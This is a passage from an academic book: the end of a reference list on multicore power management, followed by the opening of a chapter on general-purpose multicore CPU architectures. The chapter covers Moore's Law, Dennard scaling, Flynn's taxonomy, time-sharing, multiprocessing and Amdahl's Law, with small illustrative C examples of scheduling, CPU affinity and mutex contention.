Dennard RH, Gaensslen FH, Rideout VL, Bassous E, LeBlanc AR (1974) Design of ion-implanted
MOSFET’s with very small physical dimensions. IEEE J Solid-State Circuits 9(5):256–268.
https://doi.org/10.1109/JSSC.1974.1050511
Dey S, Singh AK, Wang X, McDonald-Maier K (2020) User interaction aware reinforcement
learning for power and thermal efficiency of CPU-GPU mobile MPSoCs. In: 2020 Design,
Automation & Test in Europe Conference & Exhibition (DATE). IEEE, pp 1728–1733
Dinakarrao SMP, Joseph A, Haridass A, Shafique M, Henkel J, Homayoun H (2019) Application
and thermal-reliability-aware reinforcement learning based multi-core power management.
ACM J Emerg Technol Comput Syst (JETC) 15(4):1–19
Flautner K, Kim NS, Martin S, Blaauw D, Mudge T (2002) Drowsy caches: simple techniques
for reducing leakage power. In: Proceedings of the 29th Annual International Symposium on
Computer Architecture, ISCA ’02. IEEE Computer Society, USA, pp 148–157
Gnad D, Shafique M, Kriebel F, Rehman S, Sun D, Henkel J (2015) Hayat: Harnessing dark silicon
and variability for aging deceleration and balancing. In: 2015 52nd ACM/EDAC/IEEE Design
Automation Conference (DAC). IEEE, pp 1–6
Held J, Bautista J, Koehl S (2006) From a few cores to many: a tera-scale computing research
overview. White paper, Intel
Henkel J, Dutt N (2021) Dependable embedded systems. Springer Nature. https://link.springer.
com/book/10.1007/978-3-030-52017-5
Huang K, Ha Y, Zhao R, Kumar A, Lian Y (2014) A low active leakage and high reliability phase
change memory (PCM) based non-volatile FPGA storage element. IEEE Trans Circuits Syst I:
Regul Pap 61(9):2605–2613
Isuwa S, Dey S, Ortega AP, Singh AK, Al-Hashimi BM, Merrett GV (2022) QUAREM:
Maximising QoE through adaptive resource management in mobile MPSoC platforms. ACM
Trans Embed Comput Syst (TECS) 21(4):1–29
Jin S, Qie X, Hao S (2019) Virtual machine allocation strategy in energy-efficient cloud data
centres. Int J Commun Netw Distrib Syst 22(2):181–195
Khanh PN, Singh AK, Kumar A, Aung KMM (2013) Incorporating energy and throughput
awareness in design space exploration and run-time mapping for heterogeneous MPSoCs. In:
2013 Euromicro Conference on Digital System Design. IEEE, pp 513–521
Kim N, Austin T, Baauw D, Mudge T, Flautner K, Hu J, Irwin M, Kandemir M, Narayanan V
(2003) Leakage current: Moore’s law meets static power. Computer 36(12):68–75. https://doi.
org/10.1109/MC.2003.1250885
Kim T, Sun Z, Chen HB, Wang H, Tan SXD (2017) Energy and lifetime optimizations for dark
silicon manycore microprocessor considering both hard and soft errors. IEEE Trans Very Large
Scale Integr (VLSI) Syst 25(9):2561–2574. https://doi.org/10.1109/TVLSI.2017.2707401
Kim W, Gupta MS, Wei GY, Brooks D (2008) System level analysis of fast, per-core DVFS using
on-chip switching regulators. In: 2008 IEEE 14th International Symposium on High Perfor-
mance Computer Architecture, pp 123–134. https://doi.org/10.1109/HPCA.2008.4658633
Kontorinis V, Shayan A, Tullsen DM, Kumar R (2009) Reducing peak power with a table-
driven adaptive processor core. In: 2009 42nd Annual IEEE/ACM International Symposium
on Microarchitecture (MICRO), pp 189–200. https://doi.org/10.1145/1669112.1669137
Kumar R, Zyuban V, Tullsen D (2005) Interconnections in multi-core architectures: understanding
mechanisms, overheads and scaling. In: 32nd International Symposium on Computer Architec-
ture (ISCA’05), pp 408–419. https://doi.org/10.1109/ISCA.2005.34
Li B, Wang X, Singh AK, Mak T (2019) On runtime communication and thermal-aware
application mapping and defragmentation in 3D NoC systems. IEEE Trans Parallel Distrib Syst
30(12):2775–2789
Li S, Ahn JH, Strong RD, Brockman JB, Tullsen DM, Jouppi NP (2013) The McPAT framework
for multicore and manycore architectures: simultaneously modeling power, area, and timing.
ACM Trans Archit Code Optim 10(1). https://doi.org/10.1145/2445572.2445577
Lin X, Wang Y, Pedram M (2016) A reinforcement learning-based power management framework
for green computing data centers. In: 2016 IEEE International Conference on Cloud Engineer-
ing (IC2E). IEEE, pp 135–138
Liu N, Li Z, Xu J, Xu Z, Lin S, Qiu Q, Tang J, Wang Y (2017) A hierarchical framework of cloud
resource allocation and power management using deep reinforcement learning. In: 2017 IEEE
37th International Conference on Distributed Computing Systems (ICDCS). IEEE, pp 372–382
Ma Y, Zhou J, Chantem T, Dick RP, Wang S, Hu XS (2018) Online resource management for
improving reliability of real-time systems on “big–little” type MPSoCs. IEEE Trans Comput-
Aided Des Integr Circuits Syst 39(1):88–100
Ma Y, Zhou J, Chantem T, Dick RP, Wang S, Hu XS (2019) Improving reliability of soft real-
time embedded systems on integrated CPU and GPU platforms. IEEE Trans Comput-Aided
Des Integr Circuits Syst 39(10):2218–2229
Mahesri A, Vardhan V (2005) Power consumption breakdown on a modern laptop. In: Falsafi B,
VijayKumar TN (eds) Power-aware computer systems. Springer, Berlin/Heidelberg, pp 165–
180
Mamun SA (2021) Exploring wireless data center networks: can they reduce energy consumption
while providing secure connections? Ph.D. thesis, Rochester Institute of Technology, Rochester
Mamun SA, Gilday A, Singh AK, Ganguly A, Merrett GV, Wang X, Al-Hashimi BM (2020) Intra-
and inter-server smart task scheduling for profit and energy optimization of HPC data centers. J
Low Power Electron Appl 10(4):32
Medina R, Borde E, Pautet L (2018) Availability enhancement and analysis for mixed-criticality
systems on multi-core. In: Proceedings on Design, Automation & Test in Europe Conference &
Exhibition (DATE), pp 1271–1276
Mittal S (2012) A survey of architectural techniques for DRAM power management. Int J High
Perform Syst Archit 4(2):110–119. https://doi.org/10.1504/IJHPSA.2012.050990
Munawar W, Khdr H, Pagani S, Shafique M, Chen JJ, Henkel J (2014) Peak power management
for scheduling real-time tasks on heterogeneous many-core systems. In: Proceedings of IEEE
International Conference on Parallel and Distributed Systems (ICPADS), pp 200–209. https://
doi.org/10.1109/PADSW.2014.7097809
Narayanan S, Sartori J, Kumar R, Jones DL (2010) Scalable stochastic processors. In: 2010 Design,
Automation Test in Europe Conference Exhibition (DATE 2010), pp 335–338. https://doi.org/
10.1109/DATE.2010.5457181
Navardi M, Ranjbar B, Rohbani N, Ejlali A, Kumar A (2022) Peak-power aware life-time
reliability improvement in fault-tolerant mixed-criticality systems. IEEE Open J Circuits
Syst 3:199–215. https://doi.org/10.1109/OJCAS.2022.3207598
Nawathe UG, Hassan M, Yen KC, Kumar A, Ramachandran A, Greenhill D (2008) Implementation
of an 8-core, 64-thread, power-efficient SPARC server on a chip. IEEE J Solid-State Circuits
43(1):6–20. https://doi.org/10.1109/JSSC.2007.910967
Nicolaescu D, Veidenbaum A, Nicolau A (2003) Reducing data cache energy consumption via
cached load/store queue. In: Proceedings of the 2003 International Symposium on Low Power
Electronics and Design, ISLPED’03. pp 252–257. https://doi.org/10.1109/LPE.2003.1231871
Oudaa T, Gharsellaoui H, Ahmed SB (2021) An agent-based model for resource provisioning and
task scheduling in cloud computing using DRL. Proc Comput Sci 192:3795–3804
Pagani S, Pathania A, Shafique M, Chen JJ, Henkel J (2016) Energy efficiency for clustered
heterogeneous multicores. IEEE Trans Parallel Distrib Syst (TPDS) 28(5):1315–1330
Pagani S, Chen JJ, Shafique M, Henkel J (2018) Advanced techniques for power, energy,
and thermal management for clustered manycores. Springer. https://link.springer.com/book/10.
1007/978-3-319-77479-4
Pathania A, Pagani S, Shafique M, Henkel J (2015) Power management for mobile games on
asymmetric multi-cores. In: Proceedings of IEEE/ACM International Symposium on Low
Power Electronics and Design (ISLPED). IEEE, pp 243–248
PD SM, Lin J, Zhu S, Yin Y, Liu X, Huang X, Song C, Zhang W, Yan M, Yu Z, et al. (2017) A
scalable network-on-chip microprocessor with 2.5D integrated memory and accelerator. IEEE
Trans Circuits Syst I: Regul Pap 64(6):1432–1443
Puttaswamy K, Loh GH (2007) Thermal herding: Microarchitecture techniques for controlling
hotspots in high-performance 3D-integrated processors. In: 2007 IEEE 13th International
Symposium on High Performance Computer Architecture, pp 193–204. https://doi.org/10.1109/
HPCA.2007.346197
Ranjbar B, Nguyen TDA, Ejlali A, Kumar A (2019) Online peak power and maximum temperature
management in multi-core mixed-criticality embedded systems. In: Proceedings of Euromicro
Conference on Digital System Design (DSD), pp 546–553. https://doi.org/10.1109/DSD.2019.
00084
Ranjbar B, Nguyen TDA, Ejlali A, Kumar A (2021) Power-aware run-time scheduler for mixed-
criticality systems on multi-core platform. IEEE Trans Comput-Aided Des Integr Circuits Syst
(TCAD) 40(10):2009–2023. https://doi.org/10.1109/TCAD.2020.3033374
Ranjbar B, Hosseinghorban A, Salehi M, Ejlali A, Kumar A (2022) Toward the design of fault-
tolerance-and peak-power-aware multi-core mixed-criticality systems. IEEE Trans Comput-
Aided Des Integr Circuits Syst (TCAD) 41(5):1509–1522. https://doi.org/10.1109/TCAD.2021.
3082495
Rodrigues R, Annamalai A, Koren I, Kundu S, Khan O (2011) Performance per watt benefits of
dynamic core morphing in asymmetric multicores. In: 2011 International Conference on Parallel
Architectures and Compilation Techniques, pp 121–130. https://doi.org/10.1109/PACT.2011.18
Sahoo SS, Kumar A (2021a) CLEO-CoDE: Exploiting constrained decoding for cross-layer
energy optimization in heterogeneous embedded systems. In: 2021 IFIP/IEEE 29th International
Conference on Very Large Scale Integration (VLSI-SoC), pp 1–6. https://doi.org/10.1109/
VLSI-SoC53125.2021.9606983
Sahoo SS, Kumar A (2021b) Using Monte Carlo tree search for EDA – a case-study with
designing cross-layer reliability for heterogeneous embedded systems. In: 2021 IFIP/IEEE 29th
International Conference on Very Large Scale Integration (VLSI-SoC), pp 1–6. https://doi.org/
10.1109/VLSI-SoC53125.2021.9606987
Sahoo SS, Veeravalli B, Kumar A (2016) Cross-layer fault-tolerant design of real-time systems.
In: 2016 IEEE International Symposium on Defect and Fault Tolerance in VLSI and Nanotech-
nology Systems (DFT), pp 63–68. https://doi.org/10.1109/DFT.2016.7684071
Sahoo SS, Veeravalli B, Kumar A (2018) CLRFrame: an analysis framework for designing cross-
layer reliability in embedded systems. In: 31st International Conference on VLSI Design and
17th International Conference on Embedded Systems, VLSID 2018, 6–10 Jan 2018, Pune,
India, pp 307–312. https://doi.org/10.1109/VLSID.2018.81, http://doi.ieeecomputersociety.org/
10.1109/VLSID.2018.81
Sahoo SS, Veeravalli B, Kumar A (2019) A hybrid agent-based design methodology for dynamic
cross-layer reliability in heterogeneous embedded systems. In: Design Automation Conference,
DAC 2019, 2–6 June 2019, Las Vegas, Nevada
Sahoo SS, Veeravalli B, Kumar A (2020) CL(R)early: An early-stage DSE methodology for cross-
layer reliability-aware heterogeneous embedded systems. In: 2020 57th ACM/IEEE Design
Automation Conference (DAC), pp 1–6. https://doi.org/10.1109/DAC18072.2020.9218747
Sahoo SS, Kumar A, Decky M, Wong SCB, Merrett GV, Zhao Y, Wang J, Wang X, Singh AK
(2021a) Emergent design challenges for embedded systems and paths forward: mixed-criticality,
energy, reliability and security perspectives. In: Proceedings of the 2021 International Confer-
ence on Hardware/Software Codesign and System Synthesis, CODES/ISSS ’21. Association for
Computing Machinery, New York, pp 1–10. https://doi.org/10.1145/3478684.3479246
Sahoo SS, Ranjbar B, Kumar A (2021b) Reliability-aware resource management in multi-/many-
core systems: a perspective paper. J Low Power Electron Appl 11(1):7
Salehi M, Ejlali A (2014) A hardware platform for evaluating low-energy multiprocessor embed-
ded systems based on cots devices. IEEE Trans Ind Electron (TIE) 62(2):1262–1269
Shafique M, Khan MUK, Tüfek O, Henkel J (2015) EnAAM: energy-efficient anti-aging for on-
chip video memories. In: Proceedings of the 52nd Annual Design Automation Conference, pp
1–6
Sheikh SZ, Pasha MA (2018) Energy-efficient multicore scheduling for hard real-time systems: a
survey. ACM Trans Embed Comput Syst 17(6). https://doi.org/10.1145/3291387
Shekarisaz M, Hoseinghorban A, Bazzaz M, Salehi M, Ejlali A (2021) MASTER: Reclamation of
hybrid scratchpad memory to maximize energy saving in multi-core edge systems. IEEE Trans
Sustain Comput
Singh AK, Das A, Kumar A (2013) Energy optimization by exploiting execution slacks in
streaming applications on multiprocessor systems. In: Proceedings of the Design Automation
Conference (DAC), pp 1–7
Singh AK, Dziurzanski P, Indrusiak LS (2015a) Market-inspired dynamic resource allocation in
many-core high performance computing systems. In: IEEE International Conference on High
Performance Computing & Simulation (HPCS), pp 413–420
Singh AK, Dziurzanski P, Indrusiak LS (2015b) Value and energy optimizing dynamic resource
allocation in many-core HPC systems. In: 2015 IEEE 7th International Conference on Cloud
Computing Technology and Science (CloudCom). IEEE, pp 180–185
Singh AK, Dziurzanski P, Indrusiak LS (2016a) Value and energy aware adaptive resource allo-
cation of soft real-time jobs on many-core HPC data centers. In: 2016 IEEE 19th International
Symposium on Real-Time Distributed Computing (ISORC). IEEE, pp 190–197
Singh AK, Shafique M, Kumar A, Henkel J (2016b) Analysis and mapping for thermal and energy
efficiency of 3-D video processing on 3-D multicore processors. IEEE Trans Very Large Scale
Integr (VLSI) Syst 24(8):2745–2758
Singh AK, Dey S, McDonald-Maier K, Basireddy KR, Merrett GV, Al-Hashimi BM (2020)
Dynamic energy and thermal management of multi-core mobile platforms: a survey. IEEE
Design & Test 37(5):25–33
Sun G, Liao D, Zhao D, Xu Z, Yu H (2015) Live migration for multiple correlated virtual machines
in cloud-based data centers. IEEE Trans Services Comput 11(2):279–291
Turakhia Y, Raghunathan B, Garg S, Marculescu D (2013) Hades: architectural synthesis for
heterogeneous dark silicon chip multi-processors. In: 2013 50th ACM/EDAC/IEEE Design
Automation Conference (DAC), pp 1–7. https://doi.org/10.1145/2463209.2488948
Walker MJ, Merrett GV, Al-Hashimi B (2019) Power modelling of multicore sys-
tems. https://doi.org/10.1049/PBPC022E_ch13, https://digital-library.theiet.org/content/books/
10.1049/pbpc022e_ch13
Weste NH, Harris D (2015) CMOS VLSI design: a circuits and systems perspective. Pearson
Education India
Zhu Z, Zhang W, Chaturvedi V, Singh AK (2020) Energy minimization for multicore platforms
through DVFS and VR phase scaling with comprehensive convex model. IEEE Trans on
Comput-Aided Des Integr Circuits Syst 39(3):686–699. https://doi.org/10.1109/TCAD.2019.
2894835
General-Purpose Multicore Architectures
18
Saugata Ghose
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 596
Motivating the Need for Concurrent Processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 598
Classifying Parallel Computing Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 598
Multiprocessing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 599
Thread-Level Parallelism Within an Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 601
What to Do With All These Transistors? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
Multicore CPU Hardware Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
Optimizing CPU Cores for Parallelism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
Sharing Caches and Main Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 609
Coordinating Memory Requests Across Cores . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
Scaling to Many Cores . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
Managing Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 615
Shared-Memory Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 617
Main Memory Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
Mitigating Interference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
Cache Coherence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 622
Memory Consistency Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 626
Optimizing Operating Systems for Multicore CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 628
Evaluating Multicore CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
The Evolution of Multicore CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 635
Systems-on-Chip . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 635
Heterogeneous CPU Cores . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 637
Chiplet-Based Multicore Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 638
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 640
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 640
S. Ghose
University of Illinois Urbana-Champaign, Urbana, IL, USA
e-mail: [email protected]
Abstract
The first years of the 2000s led to an inflection point in computer architectures:
While the number of available transistors on a chip continued to grow, crucial
transistor scaling properties started to break down and result in increasing
power consumption, while aggressive single-core performance optimizations
were resulting in diminishing returns due to inherent limits in instruction-level
parallelism. This led to the rise of multicore CPU architectures, which are now
commonplace in modern computers at all scales. This chapter discusses the
evolution of multicore CPUs since their introduction. Starting with a historic
overview of multiprocessing, the chapter explores the basic microarchitecture
of a multicore CPU, key challenges resulting from shared memory resources,
operating system modifications to optimize multicore CPU support, popular
metrics for multicore evaluation, and recent trends in multicore CPU design.
Keywords
Introduction
From the first commercial microprocessors in the 1970s through the end of the
1990s, microprocessors available on the market typically consisted of a single CPU
core per chip. During that time, significant architectural advancements were made to
improve the performance of the CPU core, including (but not limited to) techniques
such as out-of-order processing and superscalar execution that extracted instruction-
level parallelism (ILP) from single-thread sequential programs. These architectural
advancements were driven by two trends that governed advances in semiconductor
manufacturing process technologies. The first, Moore’s Law (Moore 1965), was an
observation made in 1965 by Gordon Moore that the number of transistors on an
integrated circuit (IC) doubled every year, which he revised in 1975 (Moore 1975)
to forecast a doubling every 2 years after 1980. Figure 1 shows a progression of
Moore’s Law, using real CPUs as examples, between 1971 and 2024. The second,
Dennard Scaling (Dennard et al. 1972, 1974), was a relationship identified by Robert
Dennard and his colleagues at IBM in the early 1970s, who observed that with every
new manufacturing process technology node (an approximately 18-month interval
at the time), both the area and the power consumption of a single transistor were
half of what was observed in the previous generation.
As Moore’s Law and Dennard Scaling made it more economical to increase
the number of transistors on a chip (effectively providing double the number of
transistors, at the same area and power budget, every 18–24 months), manufacturers
dedicated these additional transistors toward increasing the performance of the
single CPU core. Unfortunately, two critical factors made it difficult to keep
continuing this trend.
Fig. 1 Log–linear plot of selected CPUs (transistor count vs. year of release, from the Intel 4004
to the Apple M1 Ultra) introduced between 1971 and 2024, illustrating the progression of
Moore’s Law
First, as the “free” rewards of scaling started to break down
in the early 2000s, the areal power density (directly correlated to the amount of
heat dissipated per unit area) of high-end CPUs began growing rapidly (De and
Borkar 1999; Frank et al. 2001). Then-contemporary projections estimated that if
single-core CPU development continued along the trends of the time, commonplace
passive cooling elements would no longer be able to dissipate the heat generated by
the CPU (De and Borkar 1999). Second, more aggressive techniques for ILP were
yielding diminishing returns, requiring high hardware costs for meager performance
benefits (Ronen et al. 2001). These factors forced manufacturers to reconsider how
to use additional transistors to continue to deliver performance improvements, now
in a power-efficient manner (De and Borkar 1999; Ronen et al. 2001; Esmaeilzadeh
2011).
This reconsideration led to the widespread adoption of multicore CPUs (also
known as chip multiprocessors) (Ronen et al. 2001; Esmaeilzadeh 2011): Instead
of trying to make a single CPU core more powerful, manufacturers now implement
multiple, simpler CPU cores within a single chip that can run multiple tasks concur-
rently. (This chapter uses the term concurrent processing to refer strictly to multiple
independent tasks executing at the same time. It refers to the time multiplexing
of a CPU core across multiple tasks as time-sharing.) The simpler core designs
significantly reduced the areal power density (e.g., W/mm²) of the CPUs. Multicore
CPUs perform concurrent processing by (1) performing concurrent multiprocessing
of more than one program and/or (2) extracting thread-level parallelism (TLP)
from a parallelizable application. While initial commercial multicore CPUs started
out with two identical CPU cores, today’s multicore CPUs have a wide range of
configurations, with some containing dozens of cores.
This chapter will examine six topics related to multicore CPU architectures. First,
it will motivate the benefits and limitations of processing multiple tasks concurrently
and how they drove the need for parallel processing. Second, it will examine the
hardware design of a typical multicore CPU and the changes required to support
the efficient execution of multiple programs on multiple CPU cores. Third, it will
study how memory management policies change to handle the increased traffic
from multiple cores. Fourth, it will address software issues that optimize the use of
multicore CPUs. Fifth, it will introduce common metrics that are used in the context
of multicore CPUs. Finally, it will close by briefly discussing how commercial
multicore CPUs have evolved since their introduction.
Motivating the Need for Concurrent Processing
As early as the days of analog computing, the benefits of parallelizing tasks became
a clear goal: Luigi Federico Menabrea, in his 1842 study of Charles Babbage’s
Analytical Engine (Menabrea 1842), noted that a key advantage of mechanized
computation would be its ability to produce several results at the same time. In the
mid-twentieth century, as digital computers evolved rapidly, there was a pressing
need to maximize both the performance and utilization of these computers, and the
extraction of parallelism, in its various forms, became a key approach to meet these
needs.
The early decades of electronic computing saw the introduction of several now-
commonplace parallelization techniques, such as instruction pipelining (1941, with
the Zuse Z3 (Rojas 1996; Zuse 1949), followed by significant advances in 1961 with
the IBM 7030 Stretch (Dunwell 1956) and ILLIAC II (Taub et al. 1957) supercom-
puters), superscalar processing (1964, with the CDC 6600 supercomputer (Thornton
1964)), and general-purpose time-sharing (1961, with the Compatible Time-Sharing
System operating system (Corbató et al. 1962)). (In this section, significant efforts
were made to identify milestone systems that introduced or made critical leaps
forward in now-fundamental parallelism techniques. However, given the rapid pace
of concurrent computer development in the 1950s and 1960s, combined with limited
available historical resources, these examples may not always be the true originators
of the techniques. When possible, dates associated with systems denote the year of
first delivery, as a proxy for the completion of the first working system.) This set
the stage for the rise of the two key types of parallelism exposed by multicore
CPUs: multiprocessing and thread-level parallelism. While both of these types
of parallelism can be exploited by a range of hardware organizations, historical
trends in chip manufacturing process technologies drove the emergence of the
multicore CPU.
Classifying Parallel Computing Hardware
Given the rise of multiple parallel computing techniques throughout the 1960s,
there was a need to categorize the techniques based on broadly shared principles.
To this end, Michael Flynn developed what is now known as Flynn’s taxonomy in
1966 (Flynn 1966). The original taxonomy classified computer architectures into
four categories, along two dimensions (the number of concurrent instruction streams
and the number of concurrent data streams), as shown in Fig. 2: SISD (single
instruction, single data), SIMD (single instruction, multiple data), MISD (multiple
instruction, single data), and MIMD (multiple instruction, multiple data).
Fig. 2 The four categories of Flynn’s taxonomy, organized along its instruction and data
dimensions
Multiprocessing
Before the days of personal computers (PCs), mainframes were the dominant
form factor of computers. Mainframe computers had a relatively high cost: as an
example, the IBM System/360 Model 25, a low-end variant of IBM’s highly popular
mainframes, was announced in January 1968 with a purchase price of US $253,000
(US $2.33 million in 2024 dollars), with a monthly rental option at $5,330 (US
$49,000 in 2024 dollars) (Whitney and White 1968). Given the high demand to
use these computers, batching and time-sharing (i.e., time multiplexing) systems
became commonplace. Systems capable of batching would queue up multiple jobs
to execute on a computer back-to-back, while time-sharing systems extended this
capability to execute multiple programs on the same computer through temporal
multiplexing.
More concretely, time-sharing involves the use of scheduling quanta, which are
(typically predetermined) periods of time that a program can execute for before
being preempted (i.e., switched out). A time-sharing system runs one program for a
single scheduling quantum, after which it switches out the program from the CPU
and looks at a queue of pending programs (which include the one just switched
out, assuming it did not complete within the quantum). The system then selects
the next program to run, switches it into the CPU, and lets it execute for a single
scheduling quantum, before repeating the switch-out/switch-in procedure. Time-
sharing allowed multiple users to interact with a single computer at the same time,
allowing each user’s program to make forward progress even though the computer
had only a single CPU. Thanks to the typically short scheduling quanta (on the order
of milliseconds in modern machines), time-sharing often gives each user the illusion
that the computer is continuously executing their application, as the scheduling
quantum is significantly faster than human perception of response time.
While time-sharing represents a key technological shift in the accessibility of
computers, the technique suffers from two critical overheads that significantly
extend the overall execution time of a program. First, in an ideal machine, each
program now takes longer to complete as it repeatedly waits on other programs to
execute. For example, if a computer runs ten programs, each taking the same amount
of time to finish, and the operating system uses round-robin scheduling to switch
between each of the programs, the programs will take 10× longer to complete than
if they ran uninterrupted. Second, in real-world machines, the execution time of each
program is further increased by the overhead of context switching. When a program
is switched out, its registers (and for some machines, dirty cache values) must be
saved somewhere, and these values must be restored when the program is switched
back in.
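These overheads can be made concrete with a small simulation. The C sketch below uses made-up job lengths, a made-up quantum, and a made-up context-switch cost; it shows that, with ten equal jobs under round-robin scheduling, each job finishes roughly 10× later than it would have alone, plus the accumulated context-switch overhead.

/* Minimal simulation of round-robin time-sharing: N equal jobs, a fixed
 * scheduling quantum, and a fixed context-switch cost. All numbers are
 * illustrative. */
#include <stdio.h>

#define N_JOBS 10

int main(void) {
    const double job_len_ms = 1000.0;  /* each job needs 1 s of CPU time */
    const double quantum_ms = 10.0;    /* scheduling quantum */
    const double cswitch_ms = 0.01;    /* cost of one context switch */

    double remaining[N_JOBS];
    for (int i = 0; i < N_JOBS; i++) remaining[i] = job_len_ms;

    double clock_ms = 0.0;
    int done = 0;
    while (done < N_JOBS) {
        for (int i = 0; i < N_JOBS; i++) {
            if (remaining[i] <= 0.0) continue;
            double slice = remaining[i] < quantum_ms ? remaining[i] : quantum_ms;
            clock_ms += slice + cswitch_ms;  /* run the job, then switch out */
            remaining[i] -= slice;
            if (remaining[i] <= 0.0) {
                done++;
                printf("job %d finished at %.2f ms (alone: %.0f ms)\n",
                       i, clock_ms, job_len_ms);
            }
        }
    }
    return 0;
}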
As a natural progression toward concurrent execution without these overheads,
researchers began to explore whether a computer could incorporate multiple CPUs,
where the CPUs have the ability to communicate with each other. (Alternative
techniques such as multithreading were also being developed around this time,
with 1960’s Bull Gamma 60 (Dreyfus 1958) and Honeywell 800 (Minneapolis–
Honeywell DATAmatic Division 1960) being two early examples of hardware
multithreading support. A constrained version of multithreading was implemented
in the DYSEAC in 1954 (Leiner 1952).) This technique, known as multiprocessing,
was first implemented in the Burroughs B 5000 (Longergan and King 1961) and
D825 (Anderson et al. 1962) mainframe computers, released in 1961 and 1962,
respectively. In a computer capable of multiprocessing, multiple programs can
execute simultaneously, without the need to time-share the CPU. An operating
system (OS) typically sees a multi-CPU computer as a single system, and a
multiprocessing-capable OS is responsible for assigning programs to specific CPUs.
Given the high cost of CPUs, many multi-CPU machines still perform time-sharing
on each CPU in addition to multiprocessing, and the OS uses various scheduling
heuristics to determine how best to choose which CPU a program should be
scheduled on.
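As a modern point of reference, the Linux-specific C sketch below shows how a process can constrain the scheduler's placement decision by pinning itself to a single CPU; the choice of CPU 0 is arbitrary.

/* Linux-specific sketch: restrict the calling process to CPU 0, overriding
 * the scheduler's default freedom to place it on any CPU. */
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>

int main(void) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(0, &set);  /* allow execution only on CPU 0 */

    /* A pid of 0 means "the calling process". */
    if (sched_setaffinity(0, sizeof(set), &set) != 0) {
        perror("sched_setaffinity");
        return 1;
    }
    printf("now pinned to CPU 0\n");
    return 0;
}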
Thread-Level Parallelism Within an Application
Amdahl’s Law gives the theoretical speedup S of a partially parallelized program as
S = 1 / ((1 − f) + f/n)    (1)
where f is the fraction of the program that can be parallelized, and n is the number
of concurrent threads that can execute the parallelizable part of the program. To
visualize Amdahl’s Law, Fig. 3 shows an example where f = 0.4 (i.e., 40% of the
program can be parallelized), for various thread counts. As the figure shows, for
602 S. Ghose
every doubling of the thread count, the reduction in total time is only half of the
reduction achieved by the previous doubling.
Figure 4a shows the theoretical parallel speedup achievable according to the law,
for different values of f. A key takeaway from Amdahl’s Law is that even for an
infinite number of concurrent threads (i.e., n = ∞), the maximum speedup S of a
parallel program is bound by the time it takes to execute the part of the program that
is not parallelizable. While Amdahl’s Law encompasses key properties of parallel
execution, it has two important limitations.
First, Amdahl’s Law does not explicitly account for the additional overhead of
synchronization primitives. As more threads execute concurrently, the contention
for acquiring mutually exclusive access to a portion of shared memory can increase.
For example, if all of the threads of a parallel program share and update a single
counter, they must use a mutual exclusion primitive (i.e., mutex) to ensure that
updates from one thread are not inadvertently lost by another thread. This requires
each thread to acquire the mutex whenever it updates the counter, and other threads
that attempt to acquire a mutex that is currently held by another thread will stall. As
more threads execute concurrently, the likelihood increases that more threads will
contend at the same time to acquire the mutex, introducing more stalls. In practice,
these synchronization overheads from mutex contention (as well as interference
between threads due to resource sharing; see “Sharing Caches and Main Memory”)
can make it such that adding a parallel thread can actually decrease the parallel
speedup, as shown in Fig. 5.
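The shared-counter scenario can be written down directly as a minimal pthreads sketch (the thread and iteration counts below are arbitrary): every increment serializes on a single mutex, so adding threads adds contention rather than useful parallelism.

/* Minimal pthreads sketch of the shared-counter example: every update
 * serializes on one mutex, so contention grows with the thread count.
 * Compile with: cc -pthread counter.c */
#include <pthread.h>
#include <stdio.h>

#define N_THREADS 8
#define N_UPDATES 1000000

static long counter = 0;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static void *worker(void *arg) {
    (void)arg;
    for (int i = 0; i < N_UPDATES; i++) {
        pthread_mutex_lock(&lock);   /* threads stall here under contention */
        counter++;
        pthread_mutex_unlock(&lock);
    }
    return NULL;
}

int main(void) {
    pthread_t t[N_THREADS];
    for (int i = 0; i < N_THREADS; i++)
        pthread_create(&t[i], NULL, worker, NULL);
    for (int i = 0; i < N_THREADS; i++)
        pthread_join(t[i], NULL);
    printf("counter = %ld\n", counter);  /* N_THREADS * N_UPDATES */
    return 0;
}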
